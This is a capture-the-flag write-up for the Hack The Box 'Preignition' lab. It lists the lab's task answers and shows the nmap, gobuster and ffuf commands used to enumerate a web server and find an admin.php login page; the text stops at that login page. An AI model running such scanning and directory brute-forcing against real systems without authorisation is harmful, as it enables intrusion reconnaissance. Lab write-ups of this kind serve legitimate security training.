Hack The Box -Preignition Write-up (dir busting)

I will cover solution steps of the "Preignition" machine, which is part of the 'Starting Point' labs and has a difficulty rating of 'Very Easy'. This is a VIP machine so you'd need an upgrade from your free plan.

Introduction

Web servers are central to most infrastructures, often public-facing and accessible from the Internet. They typically host applications like WordPress, which provides both a public-facing site and a private admin panel (/wp-admin) for managing content, themes, and scripts. While these panels are login-protected, outdated components or misconfigurations can introduce critical vulnerabilities. For pentesters, understanding how these administrative mechanisms work is key, as exploiting them can provide attackers with an initial foothold and a path to pivot deeper into a network.

Thus, Web enumeration, specifically directory busting (dir busting), is one of the most essential skills any Penetration Tester must possess. While manually navigating websites and clicking all the available links may reveal some data, most of the links and pages may not be published to the public and, hence, are less secure. Suppose we did not know the wp-admin page is the administrative section of the WordPress site we exemplified above. How else would we have found it out if not for web enumeration and directory busting?

Check Hack the Box - Meow on how to connect to the VPN and spawn the machine.

TASK 1: Directory Brute-forcing is a technique used to check a lot of paths on a web server to find hidden pages. Which is another name for this? (i) Local File Inclusion, (ii) dir busting, (iii) hash cracking.

TASK 2: What switch do we use for nmap's scan to specify that we want to perform version detection. -sV

TASK 3: What does Nmap report is the service identified as running on port 80/tcp? http

TASK 4: What server name and version of service is running on port 80/tcp? nginx 1.14.2

TASK 5: What switch do we use to specify to Gobuster we want to perform dir busting specifically? dir

TASK 6: When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages? -x php

TASK 7: What page is found during our dir busting activities? admin.php

TASK 8: What is the HTTP status code reported by Gobuster for the discovered page? 200

Submit Flag:

We start with a preliminary scan of the target using nmap:

sudo nmap -Pn <$IP> -sV -A
or
sudo nmap <$IP> -sV

sudo nmap -Pn <$IP> -sV -A

From the scan we can see port 80 open. Obvious next step is to open a web browser of our choice and navigate to the target's IP address in the URL bar at the top of the window. This will automatically address the target's port 80 for the client-server communication and load the web page's contents. <$IP>:80

I just see a mention of nginx and realize that the target is a web server. What we are looking at on our browser screen is the default post-installation page for the nginx service, meaning that there is the possibility that this web application might not be adequately configured yet, or that default credentials are used to facilitate faster configuration up to the point of live deployment. This, however, also means that there are no buttons or links on the web page to assist us with navigation between web directories or other content. When browsing a website, links simply point to other directories or pages. Beyond these visible links, web servers may host hidden content. Instead of manually guessing URLs, a technique called directory busting (dir busting) is used to discover such content. Tools like Gobuster, written in Go, automate this process by scanning for hidden directories and files.

To install gobuster:

sudo apt install golang-go
sudo apt install gobuster

We can use the common.txt wordlist which can be downloaded from here.

For those who want a more comprehensive grasp of Gobuster's directory hunting mode, invoking the help function for the directory mode is a valuable resource. Simply use the command:

sudo gobuster dir -h

We will be using -w and -u flags.

sudo gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <$IP>

I was unable to get results from gobuster so I decided to use ffuf:

sudo ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://<$IP>/FUZZ.php

The output of our performed dir busting attempt revealed the directory /admin.php. Alongside this discovery came its associated HTTP status code 200. This status code, denoting "OK", is the standard response for a successful HTTP request. I opened the browser and accessed http://target_IP/admin.php. This URL takes us to an admin console login (see below):